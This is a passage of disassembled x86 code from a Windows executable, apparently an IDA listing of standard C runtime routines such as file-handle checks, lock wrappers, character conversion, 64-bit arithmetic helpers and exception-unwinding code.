sub_40A3AA proc near ; CODE XREF: sub_4068C4+CB�p
; sub_4068C4+13A�p ...
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push 10h
push offset dword_40E700
call __SEH_prolog4
mov eax, [ebp+arg_0]
cmp eax, 0FFFFFFFEh
jnz short loc_40A3D9
call sub_403FA2
and dword ptr [eax], 0
call sub_403F8F
mov dword ptr [eax], 9
loc_40A3D1: ; CODE XREF: sub_40A3AA+5C�j
or eax, 0FFFFFFFFh
jmp loc_40A476
; ---------------------------------------------------------------------------
loc_40A3D9: ; CODE XREF: sub_40A3AA+12�j
xor edi, edi
cmp eax, edi
jl short loc_40A3E7
cmp eax, dword_413A68
jb short loc_40A408
loc_40A3E7: ; CODE XREF: sub_40A3AA+33�j
; sub_40A3AA+7C�j
call sub_403FA2
mov [eax], edi
call sub_403F8F
mov dword ptr [eax], 9
push edi
push edi
push edi
push edi
push edi
call sub_404E8B
add esp, 14h
jmp short loc_40A3D1
; ---------------------------------------------------------------------------
loc_40A408: ; CODE XREF: sub_40A3AA+3B�j
mov ecx, eax
sar ecx, 5
lea ebx, ds:413A80h[ecx*4]
mov esi, eax
and esi, 1Fh
imul esi, 38h
mov ecx, [ebx]
movzx ecx, byte ptr [ecx+esi+4]
and ecx, 1
jz short loc_40A3E7
push eax
call sub_40BAAF
pop ecx
mov [ebp+ms_exc.disabled], edi
mov eax, [ebx]
test byte ptr [eax+esi+4], 1
jz short loc_40A451
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call sub_409DE4
add esp, 0Ch
mov [ebp+var_1C], eax
jmp short loc_40A467
; ---------------------------------------------------------------------------
loc_40A451: ; CODE XREF: sub_40A3AA+8F�j
call sub_403F8F
mov dword ptr [eax], 9
call sub_403FA2
mov [eax], edi
or [ebp+var_1C], 0FFFFFFFFh
loc_40A467: ; CODE XREF: sub_40A3AA+A5�j
mov [ebp+ms_exc.disabled], 0FFFFFFFEh
call sub_40A47C
mov eax, [ebp+var_1C]
loc_40A476: ; CODE XREF: sub_40A3AA+2A�j
call __SEH_epilog4
retn
sub_40A3AA endp
; =============== S U B R O U T I N E =======================================
sub_40A47C proc near ; CODE XREF: sub_40A3AA+C4�p
; DATA XREF: seg001:0040E718�o
push dword ptr [ebp+8]
call sub_40BB4F
pop ecx
retn
sub_40A47C endp
; =============== S U B R O U T I N E =======================================
sub_40A486 proc near ; CODE XREF: sub_4068C4+9C�p
arg_0 = dword ptr 4
inc dword_411D64
push 1000h
call sub_409323
test eax, eax
pop ecx
mov ecx, [esp+arg_0]
mov [ecx+8], eax
jz short loc_40A4AF
or dword ptr [ecx+0Ch], 8
mov dword ptr [ecx+18h], 1000h
jmp short loc_40A4C0
; ---------------------------------------------------------------------------
loc_40A4AF: ; CODE XREF: sub_40A486+1A�j
or dword ptr [ecx+0Ch], 4
lea eax, [ecx+14h]
mov [ecx+8], eax
mov dword ptr [ecx+18h], 2
loc_40A4C0: ; CODE XREF: sub_40A486+27�j
mov eax, [ecx+8]
and dword ptr [ecx+4], 0
mov [ecx], eax
retn
sub_40A486 endp
; =============== S U B R O U T I N E =======================================
sub_40A4CA proc near ; CODE XREF: sub_4068C4+91�p
; sub_409DE4+E7�p
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
cmp eax, 0FFFFFFFEh
jnz short loc_40A4E1
call sub_403F8F
mov dword ptr [eax], 9
xor eax, eax
retn
; ---------------------------------------------------------------------------
loc_40A4E1: ; CODE XREF: sub_40A4CA+7�j
push esi
xor esi, esi
cmp eax, esi
jl short loc_40A4F0
cmp eax, dword_413A68
jb short loc_40A50C
loc_40A4F0: ; CODE XREF: sub_40A4CA+1C�j
call sub_403F8F
push esi
push esi
push esi
push esi
push esi
mov dword ptr [eax], 9
call sub_404E8B
add esp, 14h
xor eax, eax
pop esi
retn
; ---------------------------------------------------------------------------
loc_40A50C: ; CODE XREF: sub_40A4CA+24�j
mov ecx, eax
and eax, 1Fh
imul eax, 38h
sar ecx, 5
mov ecx, dword_413A80[ecx*4]
movzx eax, byte ptr [ecx+eax+4]
and eax, 40h
pop esi
retn
sub_40A4CA endp
; =============== S U B R O U T I N E =======================================
sub_40A528 proc near ; CODE XREF: sub_4068C4+76�p
; sub_4068C4+82�p
mov eax, offset off_410EE0
retn
sub_40A528 endp
; =============== S U B R O U T I N E =======================================
sub_40A52E proc near ; DATA XREF: seg001:0040D238�o
mov eax, dword_413A60
test eax, eax
push esi
push 14h
pop esi
jnz short loc_40A542
mov eax, 200h
jmp short loc_40A548
; ---------------------------------------------------------------------------
loc_40A542: ; CODE XREF: sub_40A52E+B�j
cmp eax, esi
jge short loc_40A54D
mov eax, esi
loc_40A548: ; CODE XREF: sub_40A52E+12�j
mov dword_413A60, eax
loc_40A54D: ; CODE XREF: sub_40A52E+16�j
push 4
push eax
call sub_409363
test eax, eax
pop ecx
pop ecx
mov dword_412A58, eax
jnz short loc_40A57E
push 4
push esi
mov dword_413A60, esi
call sub_409363
test eax, eax
pop ecx
pop ecx
mov dword_412A58, eax
jnz short loc_40A57E
push 1Ah
pop eax
pop esi
retn
; ---------------------------------------------------------------------------
loc_40A57E: ; CODE XREF: sub_40A52E+30�j
; sub_40A52E+49�j
xor edx, edx
mov ecx, offset off_410EE0
jmp short loc_40A58C
; ---------------------------------------------------------------------------
loc_40A587: ; CODE XREF: sub_40A52E+6D�j
mov eax, dword_412A58
loc_40A58C: ; CODE XREF: sub_40A52E+57�j
mov [edx+eax], ecx
add ecx, 20h
add edx, 4
cmp ecx, offset byte_411160
jl short loc_40A587
push 0FFFFFFFEh
pop esi
xor edx, edx
mov ecx, offset dword_410EF0
push edi
loc_40A5A8: ; CODE XREF: sub_40A52E+AA�j
mov edi, edx
and edi, 1Fh
imul edi, 38h
mov eax, edx
sar eax, 5
mov eax, dword_413A80[eax*4]
mov eax, [edi+eax]
cmp eax, 0FFFFFFFFh
jz short loc_40A5CC
cmp eax, esi
jz short loc_40A5CC
test eax, eax
jnz short loc_40A5CE
loc_40A5CC: ; CODE XREF: sub_40A52E+94�j
; sub_40A52E+98�j
mov [ecx], esi
loc_40A5CE: ; CODE XREF: sub_40A52E+9C�j
add ecx, 20h
inc edx
cmp ecx, offset dword_410F50
jl short loc_40A5A8
pop edi
xor eax, eax
pop esi
retn
sub_40A52E endp
; =============== S U B R O U T I N E =======================================
sub_40A5DF proc near ; DATA XREF: seg001:0040D24C�o
call sub_40BF7A
cmp byte_411408, 0
jz short loc_40A5F2
call sub_40BD5D
loc_40A5F2: ; CODE XREF: sub_40A5DF+C�j
push dword_412A58
call sub_40405A
pop ecx
retn
sub_40A5DF endp
; =============== S U B R O U T I N E =======================================
sub_40A5FF proc near ; CODE XREF: sub_40C273+50�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
mov eax, offset off_410EE0
cmp esi, eax
jb short loc_40A62F
cmp esi, offset dword_411140
ja short loc_40A62F
mov ecx, esi
sub ecx, eax
sar ecx, 5
add ecx, 10h
push ecx
call sub_405121
or dword ptr [esi+0Ch], 8000h
pop ecx
pop esi
retn
; ---------------------------------------------------------------------------
loc_40A62F: ; CODE XREF: sub_40A5FF+C�j
; sub_40A5FF+14�j
add esi, 20h
push esi
call dword_40D130 ; RtlEnterCriticalSection
pop esi
retn
sub_40A5FF endp
; =============== S U B R O U T I N E =======================================
sub_40A63B proc near ; CODE XREF: sub_40BEA0+46�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov eax, [esp+arg_0]
cmp eax, 14h
jge short loc_40A65A
add eax, 10h
push eax
call sub_405121
mov eax, [esp+4+arg_4]
or dword ptr [eax+0Ch], 8000h
pop ecx
retn
; ---------------------------------------------------------------------------
loc_40A65A: ; CODE XREF: sub_40A63B+7�j
mov eax, [esp+arg_4]
add eax, 20h
push eax
call dword_40D130 ; RtlEnterCriticalSection
retn
sub_40A63B endp
; =============== S U B R O U T I N E =======================================
sub_40A669 proc near ; CODE XREF: sub_40C2E7+1�p
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
mov ecx, offset off_410EE0
cmp eax, ecx
jb short loc_40A694
cmp eax, offset dword_411140
ja short loc_40A694
and dword ptr [eax+0Ch], 0FFFF7FFFh
sub eax, ecx
sar eax, 5
add eax, 10h
push eax
call sub_405049
pop ecx
retn
; ---------------------------------------------------------------------------
loc_40A694: ; CODE XREF: sub_40A669+B�j
; sub_40A669+12�j
add eax, 20h
push eax
call dword_40D12C ; RtlLeaveCriticalSection
retn
sub_40A669 endp
; =============== S U B R O U T I N E =======================================
sub_40A69F proc near ; CODE XREF: sub_40BF42+9�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov ecx, [esp+arg_0]
cmp ecx, 14h
mov eax, [esp+arg_4]
jge short loc_40A6BE
and dword ptr [eax+0Ch], 0FFFF7FFFh
add ecx, 10h
push ecx
call sub_405049
pop ecx
retn
; ---------------------------------------------------------------------------
loc_40A6BE: ; CODE XREF: sub_40A69F+B�j
add eax, 20h
push eax
call dword_40D12C ; RtlLeaveCriticalSection
retn
sub_40A69F endp
; =============== S U B R O U T I N E =======================================
sub_40A6C9 proc near ; CODE XREF: sub_4068C4+9�p
; sub_406AC5+9B�p ...
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
push esi
xor esi, esi
cmp eax, esi
jnz short loc_40A6F1
call sub_403F8F
push esi
push esi
push esi
push esi
push esi
mov dword ptr [eax], 16h
call sub_404E8B
add esp, 14h
or eax, 0FFFFFFFFh
pop esi
retn
; ---------------------------------------------------------------------------
loc_40A6F1: ; CODE XREF: sub_40A6C9+9�j
mov eax, [eax+10h]
pop esi
retn
sub_40A6C9 endp
; =============== S U B R O U T I N E =======================================
sub_40A6F6 proc near ; CODE XREF: sub_406AC5+554�p
mov eax, dword_410440
or eax, 1
xor ecx, ecx
cmp dword_411D68, eax
setz cl
mov eax, ecx
retn
sub_40A6F6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40A70C proc near ; CODE XREF: sub_40A86B+12�p
var_10 = dword ptr -10h
var_8 = dword ptr -8
var_4 = byte ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = word ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
sub esp, 10h
push ebx
push esi
mov esi, [ebp+arg_4]
xor ebx, ebx
cmp esi, ebx
push edi
mov edi, [ebp+arg_8]
jnz short loc_40A732
cmp edi, ebx
jbe short loc_40A732
mov eax, [ebp+arg_0]
cmp eax, ebx
jz short loc_40A72E
mov [eax], ebx
loc_40A72E: ; CODE XREF: sub_40A70C+1E�j
; sub_40A70C+EC�j ...
xor eax, eax
jmp short loc_40A7B1
; ---------------------------------------------------------------------------
loc_40A732: ; CODE XREF: sub_40A70C+13�j
; sub_40A70C+17�j
mov eax, [ebp+arg_0]
cmp eax, ebx
jz short loc_40A73C
or dword ptr [eax], 0FFFFFFFFh
loc_40A73C: ; CODE XREF: sub_40A70C+2B�j
cmp edi, 7FFFFFFFh
jbe short loc_40A75F
call sub_403F8F
push 16h
pop esi
push ebx
push ebx
push ebx
push ebx
push ebx
mov [eax], esi
call sub_404E8B
add esp, 14h
loc_40A75B: ; CODE XREF: sub_40A70C+CC�j
; sub_40A70C+D5�j
mov eax, esi
jmp short loc_40A7B1
; ---------------------------------------------------------------------------
loc_40A75F: ; CODE XREF: sub_40A70C+36�j
push [ebp+arg_10]
lea ecx, [ebp+var_10]
call sub_4048C8
mov eax, [ebp+var_10]
cmp [eax+14h], ebx
jnz loc_40A80A
mov ax, [ebp+arg_C]
cmp ax, 0FFh
jbe short loc_40A7B6
cmp esi, ebx
jz short loc_40A793
cmp edi, ebx
jbe short loc_40A793
push edi
push ebx
push esi
call sub_403FE0
add esp, 0Ch
loc_40A793: ; CODE XREF: sub_40A70C+76�j
; sub_40A70C+7A�j ...
call sub_403F8F
mov dword ptr [eax], 2Ah
call sub_403F8F
cmp [ebp+var_4], bl
mov eax, [eax]
jz short loc_40A7B1
mov ecx, [ebp+var_8]
and dword ptr [ecx+70h], 0FFFFFFFDh
loc_40A7B1: ; CODE XREF: sub_40A70C+24�j
; sub_40A70C+51�j ...
pop edi
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_40A7B6: ; CODE XREF: sub_40A70C+72�j
cmp esi, ebx
jz short loc_40A7E8
cmp edi, ebx
ja short loc_40A7E6
loc_40A7BE: ; CODE XREF: sub_40A70C+141�j
; sub_40A70C+149�j ...
call sub_403F8F
push 22h
pop esi
push ebx
push ebx
push ebx
push ebx
push ebx
mov [eax], esi
call sub_404E8B
add esp, 14h
cmp [ebp+var_4], bl
jz short loc_40A75B
mov eax, [ebp+var_8]
and dword ptr [eax+70h], 0FFFFFFFDh
jmp loc_40A75B
; ---------------------------------------------------------------------------
loc_40A7E6: ; CODE XREF: sub_40A70C+B0�j
mov [esi], al
loc_40A7E8: ; CODE XREF: sub_40A70C+AC�j
mov eax, [ebp+arg_0]
cmp eax, ebx
jz short loc_40A7F5
mov dword ptr [eax], 1
loc_40A7F5: ; CODE XREF: sub_40A70C+E1�j
; sub_40A70C+12A�j ...
cmp [ebp+var_4], bl
jz loc_40A72E
mov eax, [ebp+var_8]
and dword ptr [eax+70h], 0FFFFFFFDh
jmp loc_40A72E
; ---------------------------------------------------------------------------
loc_40A80A: ; CODE XREF: sub_40A70C+64�j
lea ecx, [ebp+arg_4]
push ecx
push ebx
push edi
push esi
push 1
lea ecx, [ebp+arg_C]
push ecx
push ebx
mov [ebp+arg_4], ebx
push dword ptr [eax+4]
call dword_40D19C ; WideCharToMultiByte
cmp eax, ebx
jz short loc_40A83C
cmp [ebp+arg_4], ebx
jnz loc_40A793
mov ecx, [ebp+arg_0]
cmp ecx, ebx
jz short loc_40A7F5
mov [ecx], eax
jmp short loc_40A7F5
; ---------------------------------------------------------------------------
loc_40A83C: ; CODE XREF: sub_40A70C+11A�j
call dword_40D050 ; RtlGetLastWin32Error
cmp eax, 7Ah
jnz loc_40A793
cmp esi, ebx
jz loc_40A7BE
cmp edi, ebx
jbe loc_40A7BE
push edi
push ebx
push esi
call sub_403FE0
add esp, 0Ch
jmp loc_40A7BE
sub_40A70C endp
; =============== S U B R O U T I N E =======================================
sub_40A86B proc near ; CODE XREF: sub_406AC5+487�p
; sub_406AC5+8B0�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
arg_C = dword ptr 10h
push 0
push [esp+4+arg_C]
push [esp+8+arg_8]
push [esp+0Ch+arg_4]
push [esp+10h+arg_0]
call sub_40A70C
add esp, 14h
retn
sub_40A86B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40A886 proc near ; CODE XREF: sub_406AC5+34D�p
; sub_40894E+93�p ...
var_10 = dword ptr -10h
var_8 = dword ptr -8
var_4 = byte ptr -4
arg_0 = byte ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 10h
push [ebp+arg_4]
lea ecx, [ebp+var_10]
call sub_4048C8
movzx eax, [ebp+arg_0]
mov ecx, [ebp+var_10]
mov ecx, [ecx+0C8h]
movzx eax, word ptr [ecx+eax*2]
and eax, 8000h
cmp [ebp+var_4], 0
jz short locret_40A8BA
mov ecx, [ebp+var_8]
and dword ptr [ecx+70h], 0FFFFFFFDh
locret_40A8BA: ; CODE XREF: sub_40A886+2B�j
leave
retn
sub_40A886 endp
; =============== S U B R O U T I N E =======================================
sub_40A8BC proc near ; CODE XREF: sub_409DE4+17D�p
arg_0 = dword ptr 4
push 0
push [esp+4+arg_0]
call sub_40A886
pop ecx
pop ecx
retn
sub_40A8BC endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_40A8D0 proc near ; CODE XREF: sub_406AC5+785�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
arg_C = dword ptr 10h
push esi
mov eax, [esp+4+arg_C]
or eax, eax
jnz short loc_40A901
mov ecx, [esp+4+arg_8]
mov eax, [esp+4+arg_4]
xor edx, edx
div ecx
mov ebx, eax
mov eax, [esp+4+arg_0]
div ecx
mov esi, eax
mov eax, ebx
mul [esp+4+arg_8]
mov ecx, eax
mov eax, esi
mul [esp+4+arg_8]
add edx, ecx
jmp short loc_40A948
; ---------------------------------------------------------------------------
loc_40A901: ; CODE XREF: sub_40A8D0+7�j
mov ecx, eax
mov ebx, [esp+4+arg_8]
mov edx, [esp+4+arg_4]
mov eax, [esp+4+arg_0]
loc_40A90F: ; CODE XREF: sub_40A8D0+49�j
shr ecx, 1
rcr ebx, 1
shr edx, 1
rcr eax, 1
or ecx, ecx
jnz short loc_40A90F
div ebx
mov esi, eax
mul [esp+4+arg_C]
mov ecx, eax
mov eax, [esp+4+arg_8]
mul esi
add edx, ecx
jb short loc_40A93D
cmp edx, [esp+4+arg_4]
ja short loc_40A93D
jb short loc_40A946
cmp eax, [esp+4+arg_0]
jbe short loc_40A946
loc_40A93D: ; CODE XREF: sub_40A8D0+5D�j
; sub_40A8D0+63�j
dec esi
sub eax, [esp+4+arg_8]
sbb edx, [esp+4+arg_C]
loc_40A946: ; CODE XREF: sub_40A8D0+65�j
; sub_40A8D0+6B�j
xor ebx, ebx
loc_40A948: ; CODE XREF: sub_40A8D0+2F�j
sub eax, [esp+4+arg_0]
sbb edx, [esp+4+arg_4]
neg edx
neg eax
sbb edx, 0
mov ecx, edx
mov edx, ebx
mov ebx, ecx
mov ecx, eax
mov eax, esi
pop esi
retn 10h
sub_40A8D0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40A965 proc near ; CODE XREF: sub_407459+3A�p
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
push 10h
push offset dword_40E720
call __SEH_prolog4
xor eax, eax
mov ebx, [ebp+arg_0]
xor edi, edi
cmp ebx, edi
setnz al
cmp eax, edi
jnz short loc_40A99E
call sub_403F8F
mov dword ptr [eax], 16h
push edi
push edi
push edi
push edi
push edi
call sub_404E8B
add esp, 14h
or eax, 0FFFFFFFFh
jmp short loc_40A9F1
; ---------------------------------------------------------------------------
loc_40A99E: ; CODE XREF: sub_40A965+1A�j
cmp dword_413B88, 3
jnz short loc_40A9DF
push 4
call sub_405121
pop ecx
mov [ebp+ms_exc.disabled], edi
push ebx
call sub_40519A
pop ecx
mov [ebp+var_20], eax
cmp eax, edi
jz short loc_40A9CB
mov esi, [ebx-4]
sub esi, 9
mov [ebp+var_1C], esi
jmp short loc_40A9CE
; ---------------------------------------------------------------------------
loc_40A9CB: ; CODE XREF: sub_40A965+59�j
mov esi, [ebp+var_1C]
loc_40A9CE: ; CODE XREF: sub_40A965+64�j
mov [ebp+ms_exc.disabled], 0FFFFFFFEh
call sub_40A9FF
cmp [ebp+var_20], edi
jnz short loc_40A9EF
loc_40A9DF: ; CODE XREF: sub_40A965+40�j
push ebx
push edi
push dword_41157C
call dword_40D0F4 ; RtlSizeHeap
mov esi, eax
loc_40A9EF: ; CODE XREF: sub_40A965+78�j
mov eax, esi
loc_40A9F1: ; CODE XREF: sub_40A965+37�j
call __SEH_epilog4
retn
sub_40A965 endp
; =============== S U B R O U T I N E =======================================
sub_40A9F7 proc near ; DATA XREF: seg001:0040E738�o
xor edi, edi
mov ebx, [ebp+8]
mov esi, [ebp-1Ch]
sub_40A9F7 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_40A9FF proc near ; CODE XREF: sub_40A965+70�p
push 4
call sub_405049
pop ecx
retn
sub_40A9FF endp
; =============== S U B R O U T I N E =======================================
sub_40AA08 proc near ; DATA XREF: seg001:off_4107D0�o
; seg001:004107D4�o ...
push 2
call sub_40422F
pop ecx
retn
sub_40AA08 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame fpd=2A8h
sub_40AA11 proc near ; CODE XREF: sub_40773B:loc_407769�p
var_328 = dword ptr -328h
var_31C = dword ptr -31Ch
var_2D8 = dword ptr -2D8h
var_2D4 = dword ptr -2D4h
var_2D0 = dword ptr -2D0h
var_244 = word ptr -244h
var_240 = word ptr -240h
var_23C = word ptr -23Ch
var_238 = word ptr -238h
var_234 = dword ptr -234h
var_230 = dword ptr -230h
var_22C = dword ptr -22Ch
var_228 = dword ptr -228h
var_224 = dword ptr -224h
var_220 = dword ptr -220h
var_21C = dword ptr -21Ch
var_218 = dword ptr -218h
var_214 = word ptr -214h
var_210 = dword ptr -210h
var_20C = dword ptr -20Ch
var_208 = word ptr -208h
var_4 = dword ptr -4
push ebp
lea ebp, [esp-2A8h]
sub esp, 328h
mov eax, dword_410440
xor eax, ebp
mov [ebp+2A8h+var_4], eax
test byte_411160, 1
push esi
jz short loc_40AA3E
push 0Ah
call sub_405D62
pop ecx
loc_40AA3E: ; CODE XREF: sub_40AA11+23�j
call sub_407931
test eax, eax
jz short loc_40AA4F
push 16h
call sub_40793E
pop ecx
loc_40AA4F: ; CODE XREF: sub_40AA11+34�j
test byte_411160, 2
jz loc_40AAFC
mov [ebp+2A8h+var_220], eax
mov [ebp+2A8h+var_224], ecx
mov [ebp+2A8h+var_228], edx
mov [ebp+2A8h+var_22C], ebx
mov [ebp+2A8h+var_230], esi
mov [ebp+2A8h+var_234], edi
mov [ebp+2A8h+var_208], ss
mov [ebp+2A8h+var_214], cs
mov [ebp+2A8h+var_238], ds
mov [ebp+2A8h+var_23C], es
mov [ebp+2A8h+var_240], fs
mov [ebp+2A8h+var_244], gs
pushf
pop [ebp+2A8h+var_210]
mov esi, [ebp+2ACh]
lea eax, [ebp+2ACh]
mov [ebp+2A8h+var_20C], eax
mov [ebp+2A8h+var_2D0], 10001h
mov [ebp+2A8h+var_218], esi
mov eax, [eax-4]
push 50h
mov [ebp+2A8h+var_21C], eax
lea eax, [ebp+2A8h+var_328]
push 0
push eax
call sub_403FE0
lea eax, [ebp+2A8h+var_328]
add esp, 0Ch
mov [ebp+2A8h+var_2D8], eax
lea eax, [ebp+2A8h+var_2D0]
push 0
mov [ebp+2A8h+var_328], 40000015h
mov [ebp+2A8h+var_31C], esi
mov [ebp+2A8h+var_2D4], eax
call dword_40D120 ; SetUnhandledExceptionFilter
lea eax, [ebp+2A8h+var_2D8]
push eax
call dword_40D11C ; UnhandledExceptionFilter
loc_40AAFC: ; CODE XREF: sub_40AA11+45�j
push 3
call sub_4044D0
int 3 ; Trap to Debugger
sub_40AA11 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_40AB04 proc near ; CODE XREF: sub_40AD4B+220�p
; sub_40AD4B+229�p ...
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
test eax, eax
jz short locret_40AB1E
sub eax, 8
cmp dword ptr [eax], 0DDDDh
jnz short locret_40AB1E
push eax
call sub_40405A
pop ecx
locret_40AB1E: ; CODE XREF: sub_40AB04+6�j
; sub_40AB04+11�j
retn
sub_40AB04 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40AB1F proc near ; CODE XREF: sub_407BE1+81�p
; sub_40894E+32�p
var_18 = dword ptr -18h
var_10 = dword ptr -10h
var_C = byte ptr -0Ch
var_8 = byte ptr -8
var_7 = byte ptr -7
var_6 = byte ptr -6
var_4 = word ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 18h
push ebx
push [ebp+arg_8]
lea ecx, [ebp+var_18]
call sub_4048C8
mov ebx, [ebp+arg_0]
lea eax, [ebx+1]
cmp eax, 100h
ja short loc_40AB4D
mov eax, [ebp+var_18]
mov eax, [eax+0C8h]
movzx eax, word ptr [eax+ebx*2]
jmp short loc_40ABC2
; ---------------------------------------------------------------------------
loc_40AB4D: ; CODE XREF: sub_40AB1F+1D�j
mov [ebp+arg_0], ebx
sar [ebp+arg_0], 8
lea eax, [ebp+var_18]
push eax
mov eax, [ebp+arg_0]
and eax, 0FFh
push eax
call sub_40A886
test eax, eax
pop ecx
pop ecx
jz short loc_40AB7E
mov al, byte ptr [ebp+arg_0]
push 2
mov [ebp+var_8], al
mov [ebp+var_7], bl
mov [ebp+var_6], 0
pop ecx
jmp short loc_40AB88
; ---------------------------------------------------------------------------
loc_40AB7E: ; CODE XREF: sub_40AB1F+4B�j
xor ecx, ecx
mov [ebp+var_8], bl
mov [ebp+var_7], 0
inc ecx
loc_40AB88: ; CODE XREF: sub_40AB1F+5D�j
mov eax, [ebp+var_18]
push 1
push dword ptr [eax+14h]
push dword ptr [eax+4]
lea eax, [ebp+var_4]
push eax
push ecx
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_18]
push 1
push eax
call sub_40B2E8
add esp, 20h
test eax, eax
jnz short loc_40ABBE
cmp [ebp+var_C], al
jz short loc_40ABBA
mov eax, [ebp+var_10]
and dword ptr [eax+70h], 0FFFFFFFDh
loc_40ABBA: ; CODE XREF: sub_40AB1F+92�j
xor eax, eax
jmp short loc_40ABD2
; ---------------------------------------------------------------------------
loc_40ABBE: ; CODE XREF: sub_40AB1F+8D�j
movzx eax, [ebp+var_4]
loc_40ABC2: ; CODE XREF: sub_40AB1F+2C�j
and eax, [ebp+arg_4]
cmp [ebp+var_C], 0
jz short loc_40ABD2
mov ecx, [ebp+var_10]
and dword ptr [ecx+70h], 0FFFFFFFDh
loc_40ABD2: ; CODE XREF: sub_40AB1F+9D�j
; sub_40AB1F+AA�j
pop ebx
leave
retn
sub_40AB1F endp
; ---------------------------------------------------------------------------
align 10h
mov eax, [esp+8]
mov ecx, [esp+10h]
or ecx, eax
mov ecx, [esp+0Ch]
jnz short loc_40ABF9
mov eax, [esp+4]
mul ecx
retn 10h
; ---------------------------------------------------------------------------
loc_40ABF9: ; CODE XREF: seg001:0040ABEE�j
push ebx
mul ecx
mov ebx, eax
mov eax, [esp+8]
mul dword ptr [esp+14h]
add ebx, eax
mov eax, [esp+8]
mul ecx
add edx, ebx
pop ebx
retn 10h
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
push ebx
push esi
push edi
push ebp
push 0
push 0
push offset loc_40AC2C
push dword ptr [ebp+8]
call sub_40C5BE ; RtlUnwind
loc_40AC2C: ; DATA XREF: seg001:0040AC1F�o
pop ebp
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
; ---------------------------------------------------------------------------
loc_40AC34: ; DATA XREF: sub_40AC79+B�o
; seg001:0040AD06�o
mov ecx, [esp+4]
test dword ptr [ecx+4], 6
mov eax, 1
jz short locret_40AC78
mov eax, [esp+14h]
mov ecx, [eax-4]
xor ecx, eax
call sub_403F45
push ebp
mov ebp, [eax+10h]
mov edx, [eax+28h]
push edx
mov edx, [eax+24h]
push edx
call sub_40AC79
add esp, 8
pop ebp
mov eax, [esp+8]
mov edx, [esp+10h]
mov [edx], eax
mov eax, 3
locret_40AC78: ; CODE XREF: seg001:0040AC44�j
retn
; =============== S U B R O U T I N E =======================================
sub_40AC79 proc near ; CODE XREF: seg001:0040AC60�p
var_20 = dword ptr -20h
var_18 = dword ptr -18h
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push ebx
push esi
push edi
mov eax, [esp+0Ch+arg_0]
push ebp
push eax
push 0FFFFFFFEh
push offset loc_40AC34
push large dword ptr fs:0
mov eax, dword_410440
xor eax, esp
push eax
lea eax, [esp+24h+var_20]
mov large fs:0, eax
loc_40ACA2: ; CODE XREF: sub_40AC79:loc_40ACE9�j
mov eax, [esp+24h+arg_0]
mov ebx, [eax+8]
mov esi, [eax+0Ch]
cmp esi, 0FFFFFFFFh
jz short loc_40ACEB
cmp [esp+24h+arg_4], 0FFFFFFFFh
jz short loc_40ACBE
cmp esi, [esp+24h+arg_4]
jbe short loc_40ACEB
loc_40ACBE: ; CODE XREF: sub_40AC79+3D�j
lea esi, [esi+esi*2]
mov ecx, [ebx+esi*4]
mov [esp+24h+var_18], ecx
mov [eax+0Ch], ecx
cmp dword ptr [ebx+esi*4+4], 0
jnz short loc_40ACE9
push 101h
mov eax, [ebx+esi*4+8]
call sub_40AD29
mov eax, [ebx+esi*4+8]
call sub_40AD48
loc_40ACE9: ; CODE XREF: sub_40AC79+57�j
jmp short loc_40ACA2
; ---------------------------------------------------------------------------
loc_40ACEB: ; CODE XREF: sub_40AC79+36�j
; sub_40AC79+43�j
mov ecx, [esp+24h+var_20]
mov large fs:0, ecx
add esp, 18h
pop edi
pop esi
pop ebx
retn
sub_40AC79 endp
; ---------------------------------------------------------------------------
xor eax, eax
mov ecx, large fs:0
cmp dword ptr [ecx+4], offset loc_40AC34
jnz short locret_40AD1F
mov edx, [ecx+0Ch]
mov edx, [edx+0Ch]
cmp [ecx+8], edx
jnz short locret_40AD1F
mov eax, 1
locret_40AD1F: ; CODE XREF: seg001:0040AD0D�j
; seg001:0040AD18�j
retn
; ---------------------------------------------------------------------------
push ebx
push ecx
mov ebx, offset dword_411170
jmp short loc_40AD34
; =============== S U B R O U T I N E =======================================
sub_40AD29 proc near ; CODE XREF: sub_407E38+6E�p
; sub_404650+38F9�p ...
arg_0 = dword ptr 4
push ebx
push ecx
mov ebx, offset dword_411170
mov ecx, [esp+8+arg_0]
loc_40AD34: ; CODE XREF: seg001:0040AD27�j
mov [ebx+8], ecx
mov [ebx+4], eax
mov [ebx+0Ch], ebp
push ebp
push ecx
push eax
pop eax
pop ecx
pop ebp
pop ecx
pop ebx
retn 4
sub_40AD29 endp
; =============== S U B R O U T I N E =======================================
sub_40AD48 proc near ; CODE XREF: sub_407E38+7B�p
; sub_40AC79+6B�p
call eax
